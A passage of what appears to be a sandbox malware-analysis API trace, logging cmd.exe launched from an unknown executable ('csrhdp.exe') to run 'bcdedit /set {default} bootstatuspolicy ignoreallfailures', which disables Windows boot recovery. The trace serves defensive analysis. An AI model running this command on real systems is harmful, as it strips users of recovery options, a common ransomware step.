(in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x40, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.074] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x0, lpData=0x2eec50*=0x40, lpcbData=0x2eec34*=0x1000) returned 0x2 [0099.074] RegCloseKey (hKey=0x44) returned 0x0 [0099.074] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec38 | out: phkResult=0x2eec38*=0x44) returned 0x0 [0099.074] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x0, lpData=0x2eec50*=0x40, lpcbData=0x2eec34*=0x1000) returned 0x2 [0099.075] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x1, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.075] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x0, lpData=0x2eec50*=0x1, lpcbData=0x2eec34*=0x1000) returned 0x2 [0099.075] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x0, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.075] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x9, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.075] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x9, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.075] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x0, lpData=0x2eec50*=0x9, lpcbData=0x2eec34*=0x1000) returned 0x2 [0099.075] RegCloseKey (hKey=0x44) returned 0x0 [0099.075] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc41ad7 [0099.075] srand (_Seed=0x5dc41ad7) [0099.075] GetCommandLineW () returned="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0099.075] GetCommandLineW () returned="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0099.075] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.075] GetProcessHeap () returned 0x3f0000 [0099.075] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x218) returned 0x40aab0 [0099.075] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x40aac0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.075] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.075] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.075] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.075] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0099.076] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0099.076] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0099.076] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0099.076] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0099.076] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0099.076] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0099.076] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0099.076] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0099.076] GetProcessHeap () returned 0x3f0000 [0099.076] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x409590 | out: hHeap=0x3f0000) returned 1 [0099.076] GetEnvironmentStringsW () returned 0x408b00* [0099.076] GetProcessHeap () returned 0x3f0000 [0099.076] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa94) returned 0x40acd0 [0099.076] FreeEnvironmentStringsW (penv=0x408b00) returned 1 [0099.076] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.076] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.076] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.076] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.076] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.076] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.076] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.076] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.076] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.076] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.076] GetProcessHeap () returned 0x3f0000 [0099.076] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x5c) returned 0x40b770 [0099.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efa40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2efa40, lpFilePart=0x2efa20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2efa20*="Desktop") returned 0x25 [0099.076] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.077] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef750 | out: lpFindFileData=0x2ef750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x40b7e0 [0099.077] FindClose (in: hFindFile=0x40b7e0 | out: hFindFile=0x40b7e0) returned 1 [0099.077] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef750 | out: lpFindFileData=0x2ef750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x40b7e0 [0099.077] FindClose (in: hFindFile=0x40b7e0 | out: hFindFile=0x40b7e0) returned 1 [0099.077] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0099.077] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef750 | out: lpFindFileData=0x2ef750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5f5d9f50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f5d9f50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x40b7e0 [0099.077] FindClose (in: hFindFile=0x40b7e0 | out: hFindFile=0x40b7e0) returned 1 [0099.077] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.077] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0099.077] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0099.077] GetProcessHeap () returned 0x3f0000 [0099.077] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40acd0 | out: hHeap=0x3f0000) returned 1 [0099.077] GetEnvironmentStringsW () returned 0x40b7e0* [0099.077] GetProcessHeap () returned 0x3f0000 [0099.077] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xae8) returned 0x40c2d0 [0099.078] FreeEnvironmentStringsW (penv=0x40b7e0) returned 1 [0099.078] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.078] GetProcessHeap () returned 0x3f0000 [0099.078] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40b770 | out: hHeap=0x3f0000) returned 1 [0099.078] GetProcessHeap () returned 0x3f0000 [0099.078] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4016) returned 0x40cdc0 [0099.078] GetProcessHeap () returned 0x3f0000 [0099.078] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x88) returned 0x4095f0 [0099.078] GetProcessHeap () returned 0x3f0000 [0099.078] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40cdc0 | out: hHeap=0x3f0000) returned 1 [0099.078] GetConsoleOutputCP () returned 0x1b5 [0099.078] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.078] GetUserDefaultLCID () returned 0x409 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ace7b50, cchData=8 | out: lpLCData=":") returned 2 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efb50, cchData=128 | out: lpLCData="0") returned 2 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efb50, cchData=128 | out: lpLCData="0") returned 2 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efb50, cchData=128 | out: lpLCData="1") returned 2 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4acfa740, cchData=8 | out: lpLCData="/") returned 2 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4acfa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4acfa460, cchData=32 | out: lpLCData="Tue") returned 4 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4acfa420, cchData=32 | out: lpLCData="Wed") returned 4 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4acfa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4acfa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4acfa360, cchData=32 | out: lpLCData="Sat") returned 4 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4acfa700, cchData=32 | out: lpLCData="Sun") returned 4 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ace7b40, cchData=8 | out: lpLCData=".") returned 2 [0099.079] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4acfa4e0, cchData=8 | out: lpLCData=",") returned 2 [0099.079] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.080] GetProcessHeap () returned 0x3f0000 [0099.080] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20c) returned 0x4096f0 [0099.080] GetConsoleTitleW (in: lpConsoleTitle=0x4096f0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.081] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0099.081] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0099.081] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0099.081] GetProcessHeap () returned 0x3f0000 [0099.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4012) returned 0x40cdc0 [0099.081] GetProcessHeap () returned 0x3f0000 [0099.082] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40cdc0 | out: hHeap=0x3f0000) returned 1 [0099.082] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0099.082] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0099.082] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0099.082] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0099.082] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0099.082] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0099.082] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0099.082] GetProcessHeap () returned 0x3f0000 [0099.082] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x409910 [0099.082] GetProcessHeap () returned 0x3f0000 [0099.082] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x404630 [0099.083] GetProcessHeap () returned 0x3f0000 [0099.083] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x76) returned 0x4099d0 [0099.084] GetConsoleTitleW (in: lpConsoleTitle=0x2efa60, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.084] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0099.084] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0099.084] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0099.084] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0099.084] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0099.084] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0099.084] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0099.084] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0099.084] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0099.084] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0099.084] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0099.084] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0099.084] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0099.084] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0099.084] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0099.084] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0099.084] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0099.084] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0099.085] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0099.085] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0099.085] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0099.085] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0099.085] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0099.085] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0099.085] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0099.085] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0099.085] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0099.085] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0099.085] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0099.085] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0099.085] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0099.085] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0099.085] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0099.085] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0099.085] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0099.085] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0099.085] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0099.085] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0099.085] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0099.085] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0099.085] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0099.085] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0099.085] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0099.085] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0099.085] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0099.085] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0099.085] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0099.085] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0099.085] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0099.085] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0099.085] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0099.085] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0099.085] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0099.085] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0099.085] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0099.085] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0099.085] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0099.085] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0099.085] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0099.086] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0099.086] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0099.086] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0099.086] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0099.086] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0099.086] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0099.086] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0099.086] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0099.086] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0099.086] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0099.086] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0099.086] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0099.086] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0099.086] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0099.086] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0099.086] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0099.086] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0099.086] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0099.086] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0099.086] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0099.086] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0099.086] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0099.086] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0099.086] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0099.086] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0099.086] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0099.086] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0099.086] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0099.086] GetProcessHeap () returned 0x3f0000 [0099.086] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x218) returned 0x409a50 [0099.086] GetProcessHeap () returned 0x3f0000 [0099.087] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x86) returned 0x409c70 [0099.087] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0099.087] GetProcessHeap () returned 0x3f0000 [0099.087] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x420) returned 0x3f1320 [0099.087] SetErrorMode (uMode=0x0) returned 0x0 [0099.087] SetErrorMode (uMode=0x1) returned 0x0 [0099.087] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f1330, lpFilePart=0x2ef2f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef2f0*="Desktop") returned 0x25 [0099.087] SetErrorMode (uMode=0x0) returned 0x1 [0099.087] GetProcessHeap () returned 0x3f0000 [0099.087] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f1320, Size=0x6c) returned 0x3f1320 [0099.087] GetProcessHeap () returned 0x3f0000 [0099.087] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f1320) returned 0x6c [0099.087] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.087] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.088] GetProcessHeap () returned 0x3f0000 [0099.088] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x128) returned 0x409d00 [0099.088] GetProcessHeap () returned 0x3f0000 [0099.088] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x240) returned 0x3f13a0 [0099.093] GetProcessHeap () returned 0x3f0000 [0099.093] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f13a0, Size=0x12a) returned 0x3f13a0 [0099.093] GetProcessHeap () returned 0x3f0000 [0099.093] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f13a0) returned 0x12a [0099.093] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.093] GetProcessHeap () returned 0x3f0000 [0099.093] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe8) returned 0x409e30 [0099.093] GetProcessHeap () returned 0x3f0000 [0099.093] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x409e30, Size=0x7e) returned 0x409e30 [0099.093] GetProcessHeap () returned 0x3f0000 [0099.093] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x409e30) returned 0x7e [0099.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.100] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x2ef060, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef060) returned 0xffffffffffffffff [0099.100] GetLastError () returned 0x2 [0099.100] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x2ef060, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef060) returned 0xffffffffffffffff [0099.100] GetLastError () returned 0x2 [0099.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.101] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x2ef060, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef060) returned 0x409ec0 [0099.101] GetProcessHeap () returned 0x3f0000 [0099.101] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x28) returned 0x404660 [0099.101] FindClose (in: hFindFile=0x409ec0 | out: hFindFile=0x409ec0) returned 1 [0099.101] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x2ef060, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef060) returned 0xffffffffffffffff [0099.101] GetLastError () returned 0x2 [0099.101] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ef060, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef060) returned 0x409ec0 [0099.101] GetProcessHeap () returned 0x3f0000 [0099.101] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x404660, Size=0x8) returned 0x4089a0 [0099.101] FindClose (in: hFindFile=0x409ec0 | out: hFindFile=0x409ec0) returned 1 [0099.101] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.101] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.101] GetConsoleTitleW (in: lpConsoleTitle=0x2ef5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.101] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef368, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef328 | out: lpAttributeList=0x2ef368, lpSize=0x2ef328) returned 1 [0099.101] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef368, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef318, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef368, lpPreviousValue=0x0) returned 1 [0099.101] GetStartupInfoW (in: lpStartupInfo=0x2ef480 | out: lpStartupInfo=0x2ef480*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 